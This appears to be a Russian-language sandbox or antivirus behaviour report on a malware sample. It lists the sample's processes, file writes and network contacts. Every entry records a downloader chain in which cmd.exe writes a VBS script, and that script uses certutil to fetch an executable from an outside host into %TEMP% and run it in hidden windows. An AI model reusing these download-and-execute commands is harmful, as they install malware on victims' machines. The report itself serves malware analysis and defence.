Техническая информация
- '<SYSTEM32>\cmd.exe' /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "https://teleldyne.com/paytm/jarred.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && ech...
- %TEMP%\script.vbs
- %TEMP%\script.vbs
- 'te###dyne.com':443
- 'te###dyne.com':443
- DNS ASK te###dyne.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\script.vbs"
- '<SYSTEM32>\cmd.exe' /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "https://teleldyne.com/paytm/jarred.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && ech...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://teleldyne.com/paytm/jarred.exe %TEMP%\bin.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bin.exe' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 3
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://teleldyne.com/paytm/jarred.exe %TEMP%\bin.exe
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://teleldyne.com/paytm/jarred.exe %TEMP%\bin.exe
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bin.exe